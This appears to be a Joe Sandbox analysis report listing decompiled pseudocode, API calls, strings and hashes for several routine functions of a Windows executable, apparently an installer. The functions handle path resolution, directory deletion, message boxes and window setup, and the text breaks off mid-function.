Opcode ID: 0d06d14bd2fa3af9bc760083466eccd638ff423fc130bf06d7ba92caca5c68f7
Instruction ID: df39b49bb5a3206d8742c7c114f119d7ebc4f95637a316e0e20b0c275ca88c16
Opcode Fuzzy Hash: 0d06d14bd2fa3af9bc760083466eccd638ff423fc130bf06d7ba92caca5c68f7
Instruction Fuzzy Hash: 0F21E4707407047AE710BBB68C57B9A76989B09718F4044BFFA05EA1C3EABC8C15866E

Uniqueness

Uniqueness Score: -1.00%

Function 00476A90 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66
libraryfileloaderCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00476A90(void* __eax, void* __ecx, void* __edx) {
				char _v4112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t8;
				signed char _t11;
				intOrPtr* _t19;
				void* _t20;
				void* _t21;
				void* _t25;
				void* _t26;
				long _t27;
				void* _t28;
				void* _t29;
				void* _t30;

				_t21 = __ecx;
				_t30 = _t29 + 0xfffff004;
				_push(__eax);
				_t25 = __edx;
				_t26 = __eax;
				_t19 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetFinalPathNameByHandleA");
				if(_t19 == 0) {
					L9:
					_t8 = E00403494(_t25, _t26);
				} else {
					_t11 = GetFileAttributesA(E00403738(_t26));
					if(_t11 == 0xffffffff) {
						goto L9;
					} else {
						if((_t11 & 0x00000010) == 0) {
							_t27 = 0;
							__eflags = 0;
						} else {
							_t27 = 0x2000000;
						}
						_t28 = CreateFileA(E00403738(_t26), 0, 7, 0, 3, _t27, 0);
						if(_t28 == 0xffffffff) {
							goto L9;
						} else {
							_t20 =  *_t19(_t28,  &_v4112, 0x1000, 0);
							CloseHandle(_t28);
							if(_t20 <= 0) {
								goto L9;
							} else {
								_t37 = _t20 - 0xff0;
								if(_t20 >= 0xff0) {
									goto L9;
								} else {
									_t8 = E004769B8(_t30, _t20, _t21, _t25, _t25, _t26, _t37);
								}
							}
						}
					}
				}
				return _t8;
			}

0x00476a90
0x00476a94
0x00476a9a
0x00476a9b
0x00476a9d
0x00476ab4
0x00476ab8
0x00476b26
0x00476b2a
0x00476aba
0x00476ac2
0x00476aca
0x00000000
0x00476acc
0x00476ace
0x00476ad7
0x00476ad7
0x00476ad0
0x00476ad0
0x00476ad0
0x00476af1
0x00476af6
0x00000000
0x00476af8
0x00476b07
0x00476b0a
0x00476b11
0x00000000
0x00476b13
0x00476b13
0x00476b19
0x00000000
0x00476b1b
0x00476b1f
0x00476b1f
0x00476b19
0x00476b11
0x00476af6
0x00476aca
0x00476b39

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02262A38,?,?,?,02262A38,00476C54,00000000,00476D72,?,?,-00000010,?), ref: 00476AA9
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476AAF
GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02262A38,?,?,?,02262A38,00476C54,00000000,00476D72,?,?,-00000010,?), ref: 00476AC2
CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02262A38,?,?,?,02262A38), ref: 00476AEC
CloseHandle.KERNEL32(00000000,?,?,?,02262A38,00476C54,00000000,00476D72,?,?,-00000010,?), ref: 00476B0A

Strings

GetFinalPathNameByHandleA, xrefs: 00476A9F
kernel32.dll, xrefs: 00476AA4

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FileHandle$AddressAttributesCloseCreateModuleProc
String ID: GetFinalPathNameByHandleA$kernel32.dll
API String ID: 2704155762-2318956294
Opcode ID: 86a1a23235bbbc84275b5610544e98290f4e87644edb83021c6f4a33461be67c
Instruction ID: e3837007750573e7bf3eedefbd04cf9f926f51f59c13a17cdc71c6aad429c459
Opcode Fuzzy Hash: 86a1a23235bbbc84275b5610544e98290f4e87644edb83021c6f4a33461be67c
Instruction Fuzzy Hash: C2012690740F243BE52031AA4E82FBB588ECB56768F1581377A0CFB2C6E9BCAC01415E

Uniqueness

Uniqueness Score: -1.00%

Function 004591A8 Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E004591A8(void* __eax, void* __ebx, intOrPtr __ecx, char __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v9;
				char _v16;
				char _v20;
				char _v24;
				signed int _t43;
				intOrPtr _t50;
				void* _t64;
				void* _t70;
				void* _t75;
				intOrPtr _t87;
				signed int _t103;
				void* _t104;
				char _t106;
				void* _t109;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v24 = 0;
				_v8 = __ecx;
				_t106 = __edx;
				_t75 = __eax;
				_push(_t109);
				_push(0x45932a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t109 + 0xffffffec;
				_t103 = E00451E40(__eax, __edx, __eflags);
				if(_t103 == 0xffffffff || (_t103 & 0x00000010) == 0) {
					_v9 = 1;
					goto L18;
				} else {
					_v20 = _t106;
					_v16 = 0xb;
					E00456D64("Deleting directory: %s", _t75, 0,  &_v20, _t103, _t106);
					if((_t103 & 0x00000001) == 0) {
						L9:
						_t43 = E00452170(_t75, _t106, _t117);
						asm("sbb eax, eax");
						_v9 =  ~( ~_t43);
						if(_v9 != 0) {
							L18:
							_pop(_t87);
							 *[fs:eax] = _t87;
							_push(E00459331);
							return E00403400( &_v24);
						}
						_t104 = GetLastError();
						if(_v8 == 0) {
							__eflags = _a4;
							if(_a4 == 0) {
								L16:
								_v20 = _t104;
								_v16 = 0;
								E00456D64("Failed to delete directory (%d).", _t75, 0,  &_v20, _t104, _t106);
								goto L18;
							}
							_t50 = E00459000(_a4, _t75, _t106, _t104, _t106);
							__eflags = _t50;
							if(_t50 == 0) {
								goto L16;
							}
							__eflags =  *0x4980dc - 2;
							if( *0x4980dc != 2) {
								goto L16;
							}
							_v20 = _t104;
							_v16 = 0;
							E00456D64("Failed to delete directory (%d). Will delete on restart (if empty).", _t75, 0,  &_v20, _t104, _t106);
							E004590D8(_t75, _t75, _t106, _t104, _t106);
							goto L18;
						}
						_v20 = _t104;
						_v16 = 0;
						E00456D64("Failed to delete directory (%d). Will retry later.", _t75, 0,  &_v20, _t104, _t106);
						E00403510();
						E0040357C( &_v24, _t106);
						E004553BC(_v8, 0, _v24);
						goto L18;
					}
					_t115 = _t103 & 0x00000400;
					if((_t103 & 0x00000400) != 0) {
						L5:
						_t84 = _t103 & 0xfffffffe;
						_t64 = E004521E8(_t75, _t103 & 0xfffffffe, _t106, _t116);
						_t117 = _t64;
						if(_t64 == 0) {
							E00456B58("Failed to strip read-only attribute.", _t75, _t84, _t103, _t106);
						} else {
							E00456B58("Stripped read-only attribute.", _t75, _t84, _t103, _t106);
						}
						goto L9;
					}
					_t70 = E00453610(_t75, _t75, _t106, _t103, _t106, _t115);
					_t116 = _t70;
					if(_t70 == 0) {
						E00456B58("Not stripping read-only attribute because the directory does not appear to be empty.", _t75, 0, _t103, _t106);
						goto L9;
					}
					goto L5;
				}
			}

0x004591ae
0x004591af
0x004591b0
0x004591b3
0x004591b6
0x004591b9
0x004591bb
0x004591bf
0x004591c0
0x004591c5
0x004591c8
0x004591d4
0x004591d9
0x00459310
0x00000000
0x004591eb
0x004591eb
0x004591ee
0x004591fc
0x00459207
0x00459252
0x00459256
0x0045925d
0x00459261
0x00459268
0x00459314
0x00459316
0x00459319
0x0045931c
0x00459329
0x00459329
0x00459273
0x00459279
0x004592ba
0x004592be
0x004592f8
0x004592f8
0x004592fb
0x00459309
0x00000000
0x00459309
0x004592c5
0x004592ca
0x004592cc
0x00000000
0x00000000
0x004592ce
0x004592d5
0x00000000
0x00000000
0x004592d7
0x004592da
0x004592e8
0x004592f1
0x00000000
0x004592f1
0x0045927b
0x0045927e
0x0045928c
0x0045929e
0x004592a8
0x004592b3
0x00000000
0x004592b3
0x00459209
0x0045920f
0x0045921e
0x00459220
0x00459227
0x0045922c
0x0045922e
0x00459241
0x00459230
0x00459235
0x00459235
0x00000000
0x0045922e
0x00459215
0x0045921a
0x0045921c
0x0045924d
0x00000000
0x0045924d
0x00000000
0x0045921c

APIs

GetLastError.KERNEL32(00000000,0045932A,?,00000000,00000000,00000000,?,00000006,?,00000000,00495AFB,?,00000000,00495B9E), ref: 0045926E

Part of subcall function 00453610: FindClose.KERNEL32(000000FF,00453706), ref: 004536F5

Strings

Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 004592E3
Failed to delete directory (%d). Will retry later., xrefs: 00459287
Deleting directory: %s, xrefs: 004591F7
Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459248
Failed to delete directory (%d)., xrefs: 00459304
Failed to strip read-only attribute., xrefs: 0045923C
Stripped read-only attribute., xrefs: 00459230

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseErrorFindLast
String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
API String ID: 754982922-1448842058
Opcode ID: 38635ee4baefdd98191b7693f843747b3968483bb0189afe1e9cddfa599f6f9e
Instruction ID: 534d4fcf54e4ee1330a5b78aec9534ef33c9cf01648189f7a69ba484de5f92f0
Opcode Fuzzy Hash: 38635ee4baefdd98191b7693f843747b3968483bb0189afe1e9cddfa599f6f9e
Instruction Fuzzy Hash: BF41B330A04244DACB10DBA988453AF76A59B89306F51897BBC15D73D3DB7C8E0DC75A

Uniqueness

Uniqueness Score: -1.00%

Function 00422E38 Relevance: 12.1, APIs: 8, Instructions: 119
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00422E38(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v26;
				struct HWND__* _v32;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t56;
				intOrPtr _t71;
				void* _t76;
				intOrPtr _t102;
				void* _t103;
				void* _t104;
				void* _t106;
				void* _t107;
				intOrPtr _t108;

				_t104 = __esi;
				_t103 = __edi;
				_t106 = _t107;
				_t108 = _t107 + 0xffffffe4;
				_push(__ebx);
				_v8 = __eax;
				E004140C8();
				if( *((char*)(_v8 + 0x37)) != 0 ||  *((char*)(_v8 + 0x38)) == 0 || ( *(_v8 + 0x119) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x116)) == 1) {
					E00408C9C(0x49a628, 0xf032, 1, _t103, _t104);
					E0040311C();
				}
				if(GetCapture() != 0) {
					SendMessageA(GetCapture(), 0x1f, 0, 0);
				}
				ReleaseCapture();
				 *(_v8 + 0x119) =  *(_v8 + 0x119) | 0x00000008;
				_v32 = GetActiveWindow();
				_t50 =  *0x49857c; // 0x0
				_v20 = _t50;
				_t51 =  *0x49a62c; // 0x2260660
				_v24 =  *((intOrPtr*)(_t51 + 0x4c));
				_t53 =  *0x49a62c; // 0x2260660
				 *((intOrPtr*)(_t53 + 0x4c)) = _v8;
				_t54 =  *0x49a62c; // 0x2260660
				_v26 =  *((intOrPtr*)(_t54 + 0x28));
				_t56 =  *0x49a62c; // 0x2260660
				E0042337C(_t56, 0);
				_v16 = E0041EE8C(0, 0x49a628, _t103, _t104);
				_push(_t106);
				_push(0x423022);
				_push( *[fs:edx]);
				 *[fs:edx] = _t108;
				E00422DEC(_v8);
				_push(_t106);
				_push(0x422fcb);
				_push( *[fs:edx]);
				 *[fs:edx] = _t108;
				SendMessageA(E004181C8(_v8), 0xb000, 0, 0);
				 *((intOrPtr*)(_v8 + 0x128)) = 0;
				do {
					E004244A4( *0x49a628, _t103, _t104);
					if( *((char*)( *0x49a628 + 0x7c)) == 0) {
						if( *((intOrPtr*)(_v8 + 0x128)) != 0) {
							E00422D3C(_v8, 0xf032);
						}
					} else {
						 *((intOrPtr*)(_v8 + 0x128)) = 2;
					}
					_t71 =  *((intOrPtr*)(_v8 + 0x128));
				} while (_t71 == 0);
				_v12 = _t71;
				SendMessageA(E004181C8(_v8), 0xb001, 0, 0);
				_t76 = E004181C8(_v8);
				if(_t76 != GetActiveWindow()) {
					_v32 = 0;
				}
				_pop(_t102);
				 *[fs:eax] = _t102;
				_push(0x422fd2);
				return E00422DE4();
			}

0x00422e38
0x00422e38
0x00422e39
0x00422e3b
0x00422e3e
0x00422e3f
0x00422e47
0x00422e53
0x00422e82
0x00422e87
0x00422e87
0x00422e93
0x00422ea1
0x00422ea1
0x00422ea6
0x00422eae
0x00422eba
0x00422ebd
0x00422ec2
0x00422ec5
0x00422ecd
0x00422ed0
0x00422ed8
0x00422edb
0x00422ee4
0x00422eea
0x00422eef
0x00422efb
0x00422f00
0x00422f01
0x00422f06
0x00422f09
0x00422f0f
0x00422f16
0x00422f17
0x00422f1c
0x00422f1f
0x00422f34
0x00422f3e
0x00422f44
0x00422f46
0x00422f51
0x00422f6c
0x00422f71
0x00422f71
0x00422f53
0x00422f56
0x00422f56
0x00422f79
0x00422f7f
0x00422f83
0x00422f98
0x00422fa0
0x00422fae
0x00422fb2
0x00422fb2
0x00422fb7
0x00422fba
0x00422fbd
0x00422fca

APIs

GetCapture.USER32 ref: 00422E8C
GetCapture.USER32 ref: 00422E9B
SendMessageA.USER32 ref: 00422EA1
ReleaseCapture.USER32(00000000,0000001F,00000000,00000000), ref: 00422EA6
GetActiveWindow.USER32 ref: 00422EB5
SendMessageA.USER32 ref: 00422F34
SendMessageA.USER32 ref: 00422F98
GetActiveWindow.USER32 ref: 00422FA7

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CaptureMessageSend$ActiveWindow$Release
String ID:
API String ID: 862346643-0
Opcode ID: 7efaa2fea55d112b4a4bbe48ac36d8f78b83037e38f93a78b3416a4119544fed
Instruction ID: a044bb0e81697aad5bb2f1c2e33f51e018d1eeaa3f5d8fe09b274a9bdd63ae90
Opcode Fuzzy Hash: 7efaa2fea55d112b4a4bbe48ac36d8f78b83037e38f93a78b3416a4119544fed
Instruction Fuzzy Hash: D4414270B00214AFDB10EB69DA42B9D77F1EB49304F5540BAF440AB3A2D7789E40DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0042EEE8 Relevance: 12.1, APIs: 8, Instructions: 102
windowCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E0042EEE8(CHAR* __eax, void* __ebx, signed int __ecx, CHAR* __edx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct HWND__* _v16;
				intOrPtr _v20;
				char _v21;
				char _v40;
				intOrPtr _t27;
				intOrPtr _t42;
				intOrPtr _t54;
				CHAR* _t63;
				intOrPtr _t72;
				intOrPtr _t74;
				void* _t75;
				CHAR* _t77;
				void* _t79;
				void* _t80;
				intOrPtr _t81;

				_t75 = __edi;
				_t79 = _t80;
				_t81 = _t80 + 0xffffffdc;
				_push(__ebx);
				_push(__esi);
				_v8 = __ecx;
				_t77 = __edx;
				_t63 = __eax;
				if( *0x49a680 != 0) {
					_v8 = _v8 | 0x00180000;
				}
				_t27 =  *0x49a628; // 0x2262410
				if((GetWindowLongA( *(_t27 + 0x20), 0xfffffff0) & 0x10000000) == 0) {
					L4:
					_v16 = GetActiveWindow();
					_v20 = E0041EE8C(0, _t63, _t75, _t77);
					_push(_t79);
					_push(0x42ef86);
					_push( *[fs:eax]);
					 *[fs:eax] = _t81;
					_v12 = MessageBoxA(0, _t63, _t77, _v8 | 0x00002000);
					_pop(_t72);
					 *[fs:eax] = _t72;
					_push(E0042F08F);
					E0041EF40(_v20);
					return SetActiveWindow(_v16);
				} else {
					_t42 =  *0x49a628; // 0x2262410
					if((GetWindowLongA( *(_t42 + 0x20), 0xffffffec) & 0x00000080) == 0) {
						E0042ED8C();
						_push(_t79);
						_push(0x42f088);
						_push( *[fs:ecx]);
						 *[fs:ecx] = _t81;
						_v21 = E0042EDE0( &_v40);
						_push(_t79);
						_push(0x42f069);
						_push( *[fs:ecx]);
						 *[fs:ecx] = _t81;
						_v16 = GetActiveWindow();
						_v20 = E0041EE8C(0, _t63, _t75, _t77);
						_push(_t79);
						_push(0x42f014);
						_push( *[fs:eax]);
						 *[fs:eax] = _t81;
						_t54 =  *0x49a628; // 0x2262410
						_v12 = MessageBoxA( *(_t54 + 0x20), _t63, _t77, _v8);
						_pop(_t74);
						 *[fs:eax] = _t74;
						_push(E0042F01B);
						E0041EF40(_v20);
						return SetActiveWindow(_v16);
					} else {
						goto L4;
					}
				}
			}

0x0042eee8
0x0042eee9
0x0042eeeb
0x0042eeee
0x0042eeef
0x0042eef0
0x0042eef3
0x0042eef5
0x0042eefe
0x0042ef00
0x0042ef00
0x0042ef09
0x0042ef1c
0x0042ef32
0x0042ef37
0x0042ef41
0x0042ef46
0x0042ef47
0x0042ef4c
0x0042ef4f
0x0042ef64
0x0042ef69
0x0042ef6c
0x0042ef6f
0x0042ef77
0x0042ef85
0x0042ef1e
0x0042ef20
0x0042ef30
0x0042ef92
0x0042ef99
0x0042ef9a
0x0042ef9f
0x0042efa2
0x0042efad
0x0042efb2
0x0042efb3
0x0042efb8
0x0042efbb
0x0042efc3
0x0042efcd
0x0042efd2
0x0042efd3
0x0042efd8
0x0042efdb
0x0042efe4
0x0042eff2
0x0042eff7
0x0042effa
0x0042effd
0x0042f005
0x0042f013
0x00000000
0x00000000
0x00000000
0x0042ef30

APIs

GetWindowLongA.USER32 ref: 0042EF12
GetWindowLongA.USER32 ref: 0042EF29
GetActiveWindow.USER32 ref: 0042EF32
MessageBoxA.USER32 ref: 0042EF5F
SetActiveWindow.USER32(?,0042F08F,00000000,00000000,0042EF86,?,?,000000F0,00000000,?), ref: 0042EF80

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$ActiveLong$Message
String ID:
API String ID: 2785966331-0
Opcode ID: d70eba85cb0092c2572d1dff44f30dcb458b8f6f516ef4a9872502abe7e56b03
Instruction ID: f4fb3eaa4a6516aaedceac6748a0b58c5823fdf0e7ef8281d4afca69d00d3852
Opcode Fuzzy Hash: d70eba85cb0092c2572d1dff44f30dcb458b8f6f516ef4a9872502abe7e56b03
Instruction Fuzzy Hash: E131B470A00714AFD711EFB6DC52D5F7BB8EB09704B9248BAF804E3292D6389D10CA58

Uniqueness

Uniqueness Score: -1.00%

Function 00429468 Relevance: 12.1, APIs: 8, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00429468(struct HDC__* __eax, void* __ebp, void* __eflags) {
				struct tagTEXTMETRICA _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t14;
				signed int _t18;
				signed int _t20;
				struct HDC__* _t26;
				signed int _t27;
				signed int _t29;
				signed int _t30;
				void* _t31;
				void* _t35;
				struct HDC__* _t37;
				struct tagTEXTMETRICA* _t39;

				_t39 =  &_v112;
				_t37 = __eax;
				_push(0);
				L00405F14();
				_t26 = __eax;
				GetTextMetricsA(__eax, _t39);
				_t14 = SelectObject(_t26, E0041A1D0( *((intOrPtr*)(_t37 + 0x44)), _t26, _t31, _t35, _t37));
				GetTextMetricsA(_t26,  &(_v112.tmMaxCharWidth));
				SelectObject(_t26, _t14);
				_push(_t26);
				_push(0);
				L004060FC();
				if( *0x49a5c4 == 0) {
					_t27 = _t39->tmHeight;
					_t18 = _v112.tmHeight;
					if(_t27 > _t18) {
						_t27 = _t18;
					}
					_t20 = GetSystemMetrics(6) << 2;
					if(_t27 < 0) {
						_t27 = _t27 + 3;
					}
					_t29 = _t20 + (_t27 >> 2);
				} else {
					if( *((char*)(_t37 + 0xc5)) == 0) {
						_t30 = 6;
					} else {
						_t30 = 8;
					}
					_t29 = GetSystemMetrics(6) * _t30;
				}
				return E00414624(_t37, _v112 + _t29);
			}

0x0042946b
0x0042946e
0x00429470
0x00429472
0x00429477
0x0042947b
0x0042948a
0x00429497
0x0042949e
0x004294a3
0x004294a4
0x004294a6
0x004294b2
0x004294d6
0x004294d9
0x004294df
0x004294e1
0x004294e1
0x004294ea
0x004294ef
0x004294f1
0x004294f1
0x004294f9
0x004294b4
0x004294bb
0x004294c4
0x004294bd
0x004294bd
0x004294bd
0x004294d2
0x004294d2
0x0042950e

APIs

740BAC50.USER32(00000000), ref: 00429472
GetTextMetricsA.GDI32(00000000), ref: 0042947B

Part of subcall function 0041A1D0: CreateFontIndirectA.GDI32(?), ref: 0041A28F

SelectObject.GDI32(00000000,00000000), ref: 0042948A
GetTextMetricsA.GDI32(00000000,?), ref: 00429497
SelectObject.GDI32(00000000,00000000), ref: 0042949E
740BB380.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294A6
GetSystemMetrics.USER32 ref: 004294CB
GetSystemMetrics.USER32 ref: 004294E5

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Metrics$ObjectSelectSystemText$B380CreateFontIndirect
String ID:
API String ID: 3751190600-0
Opcode ID: b023dd09fd4ec06f6d46e53800f6f6acac57706d273235f8cd4e9da7ac8aa401
Instruction ID: 98898a44172f69bf24ec3d8a6ef43543c6468a87450e56550a5d5b4712d68be3
Opcode Fuzzy Hash: b023dd09fd4ec06f6d46e53800f6f6acac57706d273235f8cd4e9da7ac8aa401
Instruction Fuzzy Hash: 3901E1517087513AF710B67A9CC6F6B6198DB84358F44053FFA469A3C3D96C9C41826A

Uniqueness

Uniqueness Score: -1.00%

Function 0041DE0C Relevance: 12.1, APIs: 8, Instructions: 60
windowCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0041DE0C(int __eax) {
				int _t2;

				_push(0);
				L00405F14();
				_push(0x5a);
				_push(__eax);
				L00405C44();
				 *0x49a604 = __eax;
				_push(__eax);
				_push(0);
				L004060FC();
				_t2 =  *0x49a604; // 0x60
				 *0x4984e4 =  ~(MulDiv(8, _t2, 0x48));
				 *0x49a608 = GetStockObject(7);
				 *0x49a60c = GetStockObject(5);
				 *0x49a610 = GetStockObject(0xd);
				 *0x49a614 = LoadIconA(0, 0x7f00);
				 *0x49a618 = E00419B24(0x2c, 1);
				 *0x49a61c = E00419B24(0x10, 1);
				 *0x49a620 = E00419B24(0x10, 1);
				 *0x498564 = E00402B30(1);
				 *0x49a624 = E00402B30(1);
				return E0040AF84(0x419048, 0x41a050, 0x41a080);
			}

0x0041de0d
0x0041de0f
0x0041de16
0x0041de18
0x0041de19
0x0041de1e
0x0041de23
0x0041de24
0x0041de26
0x0041de2d
0x0041de3c
0x0041de48
0x0041de54
0x0041de60
0x0041de71
0x0041de86
0x0041de9b
0x0041deb0
0x0041dec1
0x0041ded2
0x0041deec

APIs

740BAC50.USER32(00000000,?,00419041,00496EDA), ref: 0041DE0F
740BAD70.GDI32(00000000,0000005A,00000000,?,00419041,00496EDA), ref: 0041DE19
740BB380.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419041,00496EDA), ref: 0041DE26
MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE35
GetStockObject.GDI32(00000007), ref: 0041DE43
GetStockObject.GDI32(00000005), ref: 0041DE4F
GetStockObject.GDI32(0000000D), ref: 0041DE5B
LoadIconA.USER32(00000000,00007F00), ref: 0041DE6C

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ObjectStock$B380IconLoad
String ID:
API String ID: 1412791550-0
Opcode ID: 757416ecad359ea9456f8a21dcb558b4c43af055770acadfb55ee1772f5bd968
Instruction ID: 6b51b5b9ef12793bce6ff696d6bf2aa44f125c59f143ee087c4134c2e587d034
Opcode Fuzzy Hash: 757416ecad359ea9456f8a21dcb558b4c43af055770acadfb55ee1772f5bd968
Instruction Fuzzy Hash: 831160B06443419AE740FFA96896BA63690D764708F04803FF6449F2D2DA7D1C548B9F

Uniqueness

Uniqueness Score: -1.00%

Function 004625E4 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 273
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004625E4(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				struct HICON__* _v12;
				char _v16;
				char _v17;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _t129;
				signed int _t136;
				signed int _t139;
				signed int _t142;
				intOrPtr _t149;
				intOrPtr _t153;
				intOrPtr _t157;
				intOrPtr _t158;
				intOrPtr _t159;
				signed int _t165;
				signed int _t172;
				signed int _t177;
				signed int _t180;
				void* _t183;
				void* _t186;
				intOrPtr _t188;
				intOrPtr _t191;
				void* _t204;
				intOrPtr _t212;
				intOrPtr _t238;
				signed int _t239;
				intOrPtr _t240;
				signed int _t245;
				intOrPtr _t247;
				intOrPtr _t249;
				void* _t253;
				void* _t257;
				void* _t262;
				void* _t264;
				signed int* _t270;
				intOrPtr _t271;
				intOrPtr _t272;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t277;
				intOrPtr _t278;
				void* _t279;

				_t267 = __edi;
				_t276 = _t277;
				_t278 = _t277 + 0xffffffc8;
				_v16 = 0;
				_t216 = __edx;
				_v8 = __eax;
				 *[fs:eax] = _t278;
				_t220 =  *_v8;
				 *((intOrPtr*)( *_v8 - 0x10))( *[fs:eax], 0x46299e, _t276, __edi, __esi, __ebx, _t275);
				_t129 =  *((intOrPtr*)(__edx + 8));
				_t238 =  *((intOrPtr*)(_t129 + 8));
				_t279 = _t238 - 0xfffffe6b;
				if(_t279 > 0) {
					_t239 = _t238 - 0xfffffe6d;
					__eflags = _t239;
					if(_t239 == 0) {
